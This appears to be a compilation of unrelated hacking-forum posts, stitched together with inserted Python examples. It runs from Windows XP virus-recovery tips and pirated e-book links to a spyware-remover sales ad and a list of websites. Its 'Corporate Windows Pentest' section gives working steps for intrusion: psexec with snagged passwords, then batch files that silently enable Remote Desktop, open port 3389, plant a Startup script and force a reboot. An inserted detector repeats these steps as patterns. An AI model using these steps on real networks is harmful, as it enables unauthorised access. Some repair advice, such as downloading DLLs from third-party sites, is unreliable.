XP Security Basics



Let's say you were hacked and all your data is gone. What do you do?
I will teach you how to recover from that corruption and how to prevent it from happening again.

I. Recovering
II.Preventing

I.Recovering

I.I.Dangerous Viruses
I.II.Blue Screen
I.III.Error Messages
I.IV.Missing DLL
I.V.Minor viruses
I.VI.Very Dangerous Viruses

I.I.Dangerous Viruses

If you are reading this thread then you must be a member or guest on Greyhat-Security, which means you like downloading stuff off the web. But you never know whether the stuff you download is clean and free of viruses. Then one day you download something, you reboot, and what do you know? Some files have been created by themselves and some files can't be accessed. What to do? Go to Google and download an anti-virus. Here are some links:
AVG - http://free.grisoft.com/
Avast - www.avast.com/eng/download-avast-home.htm
Kaspersky - www.kaspersky.com/downloads
NOD32 - www.eset.com/download/

Download, install, update and run a full scan. Your Windows is now cleaned of viruses. To make sure, scan again.

Then download Spyware Doctor here:
http://www.pctools.com/spyware-doctor/
Download, install, update and run a full scan. Your Windows is now cleaned of spyware.

Then download a malware remover:
http://www.softpedia.com/get/Antivirus/M...nner.shtml
Download, install, update and run a full scan. Your Windows is now cleaned of malware.

Then download a trojan remover:
http://www.softpedia.com/get/Antivirus/T...over.shtml
Download, install, update and run a full scan. Your Windows is now cleaned of trojans.

YOUR WINDOWS IS NOW CLEAN.

When you finish the above, use Disk Cleanup to delete anything unwanted, and then run Disk Defragmenter. Your Windows is now back to normal.


I.II.Blue Screen
Blue screen, a.k.a. the Blue Screen of Death, is an error that Windows XP has. It mostly appears when you have a system error. And that blue screen saves the day: it helps prevent any damage to your computer by shutting it down. How to recover from blue screens:
Get your Windows XP installation CD, put it in your CD-ROM drive and restart the computer. Boot from the CD. When a blue window (I think) comes up, press R. Type in:
CHKDSK /R

and press Enter. When the repair process is done, type in:
BOOTCFG

When that is finished, restart and keep your finger on F8. When a black window comes up with options, select:
Last Known Good Configuration

Your Windows is now recovered.

I.III.Error messages
Some error messages show at startup and some when starting an application. I will talk about both. An error message at startup is probably a missing DLL; I will talk about that later. Sometimes it is an unknown message sent to a Windows component like autoexec.bat or command.com (this will also be discussed in the Missing DLL part). When starting an application, sometimes the problem is the setup file; maybe a file wasn't completely installed. Use Reinstall in Add/Remove Programs. Some programs don't have Reinstall, so just uninstall and install again. If the problem persists, then it is the download link. Try downloading from another source.
For example, if you are going to download LimeWire, don't download from http://www.download.com but from http://www.limewire.com .
It is always better to download from the original site.

I.IV.Missing Dlls
When something bad has happened, a DLL is corrupted. DLLs are mostly in System32. So find your corrupted DLL (to find it, take a look at the startup error; you should see the DLL name there). When you have found your DLL, go to:
http://www.dll-files.com/
and search for it. When you find it, download it and replace the old DLL with it.

Then download Registry Booster 2 here:
http://www.liutilities.com/products/registrybooster/
and run a full scan. That should clear things out. Then go to Run and type drwatson.exe, drwtsn32.exe or dwwin.exe, depending on your Windows version, and follow this Wiki:

Quote:
The information obtained and logged by Dr. Watson is the information needed by technical support personnel to diagnose a program error for a computer running Windows. A text file (Drwtsn32.log) is created whenever an error is detected, and can be delivered to support personnel by the method they prefer. A crash dump file can also be created, which is a binary file that a programmer can load into a debugger. Dr. Watson can be made to generate more exacting information for debugging purposes if the appropriate symbol files are installed and the symbol search path (environment variable) is set. When a program error occurs in Windows, the system searches for a program error handler. A program error handler deals with errors as they arise during the running of a program. If the system does not find a program error handler, the system verifies that the program is not currently being debugged and considers the error to be unhandled. The system then processes unhandled errors by looking in the registry for a program error debugger for which Dr. Watson is the default. A third-party debugger can also be used in place of Dr. Watson. The Watcom C compiler includes a similar crash-analysis tool named "Dr. Watcom"


I.V.Minor Viruses
When you have small, spammy, annoying viruses, a System Restore might be your best bet.

I.VI.Very Dangerous Viruses
Very dangerous viruses cannot be cleaned with an anti-virus, but only with a format. Here I will teach you how to format:
First make a backup and put all the files you need in it.
Then put your Windows XP installation CD in the CD-ROM drive.
Restart and boot from the CD.
A blue window will appear, and at the bottom you will see different options. Don't press any of them; be patient and you will see the CD loading some files (you will see names like sound device...). When that is done you will see options; press Enter.
A new window will appear where you can see all your drives/partitions. Choose your system drive, or the drive that you want to format, and press "D" (sometimes you only have C:\ and no D:\, so the step before is not needed). In the new window, press L.
You are back at the previous screen, but instead of C:\ and D:\ you have sizes (e.g. 1515MB). Highlight the size and press C. In the new window, press Enter.
Back at the previous window, you will have something that looks like this: "C: Partition1...". Highlight it and press Enter.
In the new window choose NTFS (this is just my recommendation). There will be 4 options, I think, quick and full, I don't know, but don't choose quick; choose the other one and press Enter. That will format the drive. Then there is the configuring, which is up to you. When you finish configuring, install the Windows drivers and that's it: a new Windows.

II.Preventing
So you have just been saved from the viruses and now you don't want to make the same mistakes again? Here is how.
Always use the internet through a proxy; it will be almost impossible to connect to you. Then change IPs every now and then.
Turn your firewall on. And every 2 weeks update your Windows. Always use an anti-virus. Check your download links. Always use a fake e-mail address and a fake name. Disable telnet/NetBIOS. Never download hacking tools that you think might be viruses. Avoid making batch files and saving them as something.bat (because if they are destructive you don't know when they will automatically launch). DO NOT USE P2P for software, maybe for music. If a friend tells you "I created a website similar to Myspace/Gmail/Hotmail...", don't accept; it's probably phishing. Make sure that you never log on to MSN at your friend's house, as it might be keylogged.

Corporate Windows Pentest


In most corporate environments all the XP boxes are on a domain, which means their credentials are just flying around all over. Cracking these passwords is difficult because of the Kerberos encryption scheme; however, most people's personal passwords, to things like Myspace, etc., will not be encrypted, and sometimes these passwords are the same as their domain credentials.

Traditionally, on machines in a corporate network RDP is enabled, but if it isn't then you can use psexec to get it set up.

http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx

Open the cmd prompt by hitting Start, Run, then typing cmd and hitting Enter.

Type this into the cmd prompt (make sure you are in the directory that psexec is in when you do this; you could add psexec to the system path if you got in the habit of using it):

psexec \\machinename -u username cmd

It will prompt you for a password, which hopefully you have previously snagged. Username should be the username, not the word. The cmd in the command above says to execute a cmd prompt, which will appear on your machine as a standard cmd, but it is linked to their machine. To verify you are connected to their machine, type hostname and make sure their machine name is shown, not yours. PSEXEC has an option for uploading a file when you use it, but I haven't had the best of luck with it. What I do is use the net command to map a drive to your computer from the other computer, i.e.:

net use r: \\yourmachinename\public /persistent:no

This will map the drive to your computer's shared folder named public. So now you can just type (remember this is in the remote machine's cmd, not your own):

Z:


So you can run a silent install of VNC for some sweet GUI action, or, if you know no one is actually in front of the computer, you can create these three bat files and run first.bat.

Make three .bat files in the same directory on a thumb drive:

first.bat

code:

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
mkdir c:\batter
copy second.bat c:\batter
copy third.bat c:\batter
cd %USERPROFILE%\Start Menu\programs\Startup\start.bat
copy c:\batter\second.bat start.bat
shutdown -r -t 0

second.bat

code:

netsh firewall set portopening tcp 3389 "RemoteDesktop"
cd c:\batter
third.bat

third.bat

code:

cd %USERPROFILE%\Start Menu\programs\Startup\
del start.bat


This enables remote desktop on that machine and you can now remote in.
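
Seen from the defender's side, the three batch files above leave a recognisable trail. The following is an added example, not part of the original post: a Python sketch that scans process-creation command lines and flags hosts where RDP was switched on together with the supporting steps. The host names, the user name and the log format are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample: (host, command line) pairs as an endpoint log might
# record them. WS-042 replays the batch files; WS-017 is ordinary admin work.
SAMPLE_EVENTS = [
    ("WS-042", r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0'),
    ("WS-042", r'cmd /c copy c:\batter\second.bat "C:\Documents and Settings\alice\Start Menu\Programs\Startup\start.bat"'),
    ("WS-042", r'shutdown -r -t 0'),
    ("WS-042", r'netsh firewall set portopening tcp 3389 "RemoteDesktop"'),
    ("WS-017", r'reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections'),
    ("WS-017", r'netsh firewall show config'),
]

# One rule per behaviour in first.bat / second.bat.
RULES = [
    # fDenyTSConnections written as 0 means Remote Desktop is allowed.
    ("rdp_enabled_via_registry",
     re.compile(r'\breg(\.exe)?\s+add\b.*fDenyTSConnections.*/d\s+0\b', re.I)),
    # Firewall change that names the RDP port (also matches netsh advfirewall).
    ("firewall_opened_3389",
     re.compile(r'\bnetsh(\.exe)?\s+(adv)?firewall\b.*\b3389\b', re.I)),
    # A script file written into a user's Startup folder runs at next logon.
    ("batch_dropped_in_startup",
     re.compile(r'\\Start Menu\\Programs\\Startup\\[^"\\]*\.(bat|cmd)\b', re.I)),
    # Immediate reboot, used here to trigger the Startup script.
    ("forced_reboot",
     re.compile(r'\bshutdown(\.exe)?\s+.*[-/]r\b', re.I)),
]


def triage(events):
    """Map each host to the sorted rule names its command lines matched."""
    hits = defaultdict(set)
    for host, cmdline in events:
        for name, pattern in RULES:
            if pattern.search(cmdline):
                hits[host].add(name)
    return {host: sorted(names) for host, names in hits.items()}


def hosts_to_investigate(events):
    """Hosts where RDP was enabled AND at least one supporting step was seen.

    Requiring two signals keeps a lone, legitimate registry change by an
    administrator from raising the same alert as the full sequence.
    """
    flagged = []
    for host, names in triage(events).items():
        if "rdp_enabled_via_registry" in names and len(names) >= 2:
            flagged.append(host)
    return sorted(flagged)


if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
    print(hosts_to_investigate(SAMPLE_EVENTS))
```
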

E-book: Make Joomla Templates in 5 Easy Steps


That's right, this is an absolute beginner's guide to creating your own Joomla templates. You don't need any fancy software, or graphic design skills. You don't need to know anything about HTML, PHP or programming, just an open mind and a willingness to learn. Make Joomla Templates in 5 Easy Steps: this incredible Beginners Guide is just that:
* A 91 page instructional e-book
* Over 100 step by step visual illustrations
* 5 easy steps to create your own Joomla template.
Download Link: http://rapidshare.com/files/110300939/Make_a_Joomla_Template_in_5_Easy_Steps.rar

E-Book: Hacking-The_Art_of_Exploitation


It's a really nice book; I thought it would be nice to share. Hacking is the art of creative problem solving, whether used to find an unconventional solution to a difficult problem or to exploit holes in sloppy programming. Many people call themselves hackers, but few have the strong technical foundation that a hacker needs to be successful. Hacking: The Art Of Exploitation explains things that every real hacker should know. While many hacking books show you how to run other people’s exploits without really explaining the technical details, Hacking: The Art Of Exploitation introduces you to the spirit and theory of hacking as well as the science behind it all. By learning some of the core techniques and clever tricks of hacking, you will begin to understand the hacker mindset. Once you learn to think like a hacker, you can write your own hacks and innovate new techniques, or you can thwart potential attacks on your system.

Download Link: http://rapidshare.com/files/63948662/Hacking-The_Art_of_Exploitation.rar

Hacking Basics Part 1


INTRODUCTION

I. What is hacking?

If you use the term 'hacking' in public areas, thoughts that will run through the minds of the people around you will be: "People who break into computers. People who steal private information. Criminals, Terrorists.", and things along those lines. This is because the term 'hacking' has been twisted by ignorance. The same ignorance that informs us of 'accurate' news every day. The same ignorance that lies about a term so pure just to make itself seem stronger. This ignorance has been fed into the minds of the people around us, almost spoon-fed. The public is a mindless pawn. It will believe whatever this ignorance feeds it. I say we take a stand. I say we wage war with ignorance.

Why?, you may ask. Why would all of these people twist something like that? It's because it was US who embraced the Information Age. It was US who felt right, understood and accepted, and at home through our phone lines. Not them. They were too busy feeding ignorance to the ignorant. They would rather pollute a term and stereotype all hackers as criminals than actually hear our sides of the stories or see our views on everything.

II. What is a hacker?

To me, a hacker is anyone willing to push farther and farther for the gain of knowledge and for the experience. This doesn't have to be in the technology area necessarily, however the term 'hacker' in this tutorial will be directly associated with computers.

Among hacker ethics, there are two types of hackers: white hats and black hats. Some even consider the 'gray hat', which is in between. A white hat is what a hacker truly is. They are in it for the knowledge, the experience, and because the Internet feels like a real home; like a place where they belong. They feel as though they know everyone on the Internet, even though they will probably never meet in person. Black hats, on the other hand, are not real hackers. They are people who will do everything just to be destructive. They are one reason that caused the pollution of the term 'hacker'. Many black hats are script kiddies, or 'skiddies'. This is a term used to identify people who download programs and use them for what they want to do. All they typically know is what to 'click' and what to 'type', but not how everything works. They will use these programs to cause damage and they won't even know what is going on. All they know is where to click to 'hack'.

III. Where do I start?

You may be a beginner hacker. You may be completely new to this, but that is OK. That is the reason why this tutorial was born. As long as you are willing to learn, we are willing to teach. But do note, you must 'crawl before you can walk'. What I am saying is that you need to learn the basics first. This means you SHOULDN'T join a website and immediately ask someone to tell you how to hack a website or a computer. Most likely, you will not get the reply you are looking for, and you will end up getting looked down upon.

By the end of this tutorial, you should have a basic understanding of the basics. Feel free to ask questions if you get confused on anything though. Once you understand the basics, everything else will come to you easily.

THE BASICS

I. Networking

Millions of people surf the web each day, however, a small percentage of those people know how the Internet works.

First off, realize that the web and the Internet are two SEPARATE things. The web is all the content on the Internet that can be viewed, modified, shared, etc. through HTTP (Port 80). We will talk about ports later. The Internet is all of the networks in the world and all the ports put together.

-LANs and WANs

There are two types of networks, LANs and WANs. A LAN (Local Area Network) is a network in one area. LANs are typically on the same internet connection (a T1 or T3, depending on how rich the bastards are), and have things such as file and printer sharing enabled. A WAN (Wide Area Network) is a group of inter-connected LANs. The ultimate WAN is the Internet. Think of it like this: all the computers in your school make up a LAN. That LAN may share different drives for students and/or teachers to access and may also have numerous printers shared. Also, that LAN may have a few smaller LANs within it (i.e. a computer lab and a library). All the schools' LANs make up your school district's WAN.

-TCP/IP

You probably use the web a lot, as do millions of others. But do you know what happens internally, or how you are able to use the Internet?

The fact is that there are many different things that occur just when you check your email, make a blog post, or even visit a website. Most of the responsibility of your ability to use the Internet lies with TCP/IP.

While I'm not going to give you a full tutorial of TCP/IP (you can view one here.) simply because I don't want to confuse you, I will explain the basics. TCP/IP (Transmission Control Protocol/Internet Protocol) is all the different processes that occur when the Internet is accessed.

When a program transfers data between your computer and the Internet, it uses TCP/IP. First, it sends the request to your TCP/IP layer. Your TCP/IP layer then takes the data, breaks it down into packets, transfers it through the modem to the cables, and sends it to the destination. The receiving machine's TCP/IP layer then takes the data off the cable, compiles the packets into user-readable data, and then displays it. All of this is done in a matter of seconds.

-IP Addresses

Fingerprints. Everyone has them. They help identify criminals and help to solve cases. The familiarity of this term mostly makes you think of that, but in the technology world, you should consider computer fingerprints.

IP Addresses are computer fingerprints. They function just like human fingerprints in a way. They help to solve computer crimes.

But there is a way that human fingerprints and computer fingerprints differ: If you find someone's fingerprint, you can't simply track them down and attack them. With a computer fingerprint, this can be accomplished.

IP Addresses are a set of four numbers ranging from 0 to 255 that are separated by periods (i.e. 65.72.73.81). There are two types of IP Addresses: static and dynamic. Static IPs (or external IPs) never change. They are assigned to connections by ISPs. Dynamic IPs (or internal IPs) are changeable, and they are assigned to devices on a LAN. Note that most computer IPs begin with '192.168' (i.e. 192.168.1.1)

With an IP, someone can find where you live, your network information (ISP, hostname, etc.), and they can even attack you (in cyber terms, not physically, (unless they come to your house O_o))

-Ports

Ports are how all your data transactions are organized. Without ports, you would get data errors, overflows, etc.

There are two types of ports: physical and virtual. Physical ports are on the back of your computer. They require human/physical interaction to be modified. Virtual ports, however, do not require human interaction, although many interactions involve a human.

There are 65,535 ports. Ports from 0 to 1023 are not allowed for use by programmers. These ports come pre-defined on each computer. They are for common protocols such as HTTP (web), FTP (File Transferring), and Telnet. After port 1023, the rest can be used for pretty much anything (even more than one protocol/app, as long as it is one at a time).

List of Well Known Ports

# Description
1 TCP Port Service Multiplexer (TCPMUX)
5 Remote Job Entry (RJE)
7 ECHO
18 Message Send Protocol (MSP)
20 FTP -- Data
21 FTP -- Control
22 SSH Remote Login Protocol
23 Telnet
25 Simple Mail Transfer Protocol (SMTP)
29 MSG ICP
37 Time
42 Host Name Server (Nameserv)
43 WhoIs
49 Login Host Protocol (Login)
53 Domain Name System (DNS)
69 Trivial File Transfer Protocol (TFTP)
70 Gopher Services
79 Finger
80 HTTP
103 X.400 Standard
108 SNA Gateway Access Server
109 POP2
110 POP3
115 Simple File Transfer Protocol (SFTP)
118 SQL Services
119 Newsgroup (NNTP)
137 NetBIOS Name Service
139 NetBIOS Datagram Service
143 Interim Mail Access Protocol (IMAP)
150 NetBIOS Session Service
156 SQL Server
161 SNMP
179 Border Gateway Protocol (BGP)
190 Gateway Access Control Protocol (GACP)
194 Internet Relay Chat (IRC)
197 Directory Location Service (DLS)
389 Lightweight Directory Access Protocol (LDAP)
396 Novell Netware over IP
443 HTTPS
444 Simple Network Paging Protocol (SNPP)
445 Microsoft-DS
458 Apple QuickTime
546 DHCP Client
547 DHCP Server
563 SNEWS
569 MSN
1080 Socks
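
The IP address and port descriptions above, as an added example that is not part of the original tutorial: a strict Python parser for the "four numbers from 0 to 255 separated by periods" format, plus a bitmask check of which addresses fall in the private ranges. It goes slightly beyond the text, which only mentions 192.168: the 10.x and 172.16-31.x private blocks and the 127.x loopback block are included, and the function names are illustrative.

```python
PRIVATE_BLOCKS = [            # RFC 1918 private ranges (base address, prefix bits)
    ("10.0.0.0", 8),
    ("172.16.0.0", 12),
    ("192.168.0.0", 16),      # the "begins with 192.168" case from the text
]


def parse_ipv4(text):
    """Return the address as a 32-bit integer, or None if it is not exactly
    four decimal numbers in 0..255 separated by periods."""
    parts = text.split(".")
    if len(parts) != 4:
        return None
    value = 0
    for part in parts:
        # Rejects empty fields, signs, spaces and non-ASCII digits.
        if not (part.isascii() and part.isdigit()):
            return None
        # Leading zeros are refused: some parsers read "010" as octal 8,
        # so two tools can disagree about which host a log line names.
        if len(part) > 1 and part[0] == "0":
            return None
        number = int(part)
        if number > 255:
            return None
        value = (value << 8) | number
    return value


def in_block(addr, base, prefix_len):
    """True if the top prefix_len bits of addr equal those of base."""
    mask = (0xFFFFFFFF << (32 - prefix_len)) & 0xFFFFFFFF
    return (addr & mask) == (parse_ipv4(base) & mask)


def classify_address(text):
    """Label an address string: invalid, loopback, private or public."""
    addr = parse_ipv4(text)
    if addr is None:
        return "invalid"
    if in_block(addr, "127.0.0.0", 8):
        return "loopback"
    for base, prefix_len in PRIVATE_BLOCKS:
        if in_block(addr, base, prefix_len):
            return "private"
    return "public"


def classify_port(port):
    """Split port numbers at the 0-1023 boundary the text describes."""
    if not isinstance(port, int) or not 0 <= port <= 65535:
        return "invalid"
    return "well-known" if port <= 1023 else "above-1023"


if __name__ == "__main__":
    for sample in ("65.72.73.81", "192.168.1.1", "172.32.0.1", "192.168.01.1"):
        print(sample, classify_address(sample))
```
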

II. Your Operating System

The operating system of your computer is how you interact with your computer. The layer you see is a Graphical User Interface (GUI). Under that, there is the shell and then the kernel. The GUI layer sends commands to the shell, which is the interface (with no graphics) of the kernel, which is basically the 'brain' of your computer. The kernel then executes the command and sends output back to the shell, which sends it to the GUI, which displays it. This is done by the scripts of your operating system and the scripts of whatever program/tool you are using.

I.E.: You double-click on Notepad. Your GUI layer calls up your shell and says, "Hey, this kid wants to open Notepad.". The shell relays the message with the proper command (which is 'start notepad') to the kernel, which runs through all the scripts required to open Notepad, and then opens it. It calls the shell and says, "Done. Tell the GUI layer to open such and such scripts to display it interactively.". The shell relays this to the GUI, which displays an interactive Notepad window.

Selling Spyware QuickFix Source code


I am selling the source code of my program Spyware QuickFix. It was supposed to be released as a commercial product, but since I got busy with some other projects I'm selling it now.

Now with Full Source Code!
Only 100
89 copies left

For the first time ever, you can now get master resell rights to this hot new software! That's right, Now you can create your own spyware software with your name on it, and start selling it, That's right, sell it and keep 100% of the profits.

Software License:

[YES] Includes FULL Source Code (Delphi7).
[YES] Includes 10,000+ of spywares, keyloggers, trojans database file.
[YES] Includes Spywares Database Editor with source code, so you can update your database.
[YES] Includes salespage and graphics.
[YES] Sales letter can be edited w/your own name put on it.


For further details, please check http://spykesoft.com/QuickFix/

Time Magazine - 25 Sites We Can't Live Without


1. Amazon.com
2. BBC.Co.uk
3. Citysearch.com
4. Craigslist.org
5. Del.icio.us
6. Digg.com
7. Ebay.com
8. ESPN.com
9. Facebook.com
10. FactCheck.org
11. Flickr.com
12. Google.com
13. HowStuffWorks.com
14. The Internet Movie Database
15. YouTube.com
16. Kayak.com
17. NationalGeographic.com
18. Netflix.com
19. Technorati.com
20. TMZ.com
21. USA.gov
22. TelevisionWithoutPity.com
23. WebMD.com
24. Wikipedia.org
25. Yahoo.com



The website

Yahoo.com - 25 Sites We Can't Live Without - TIME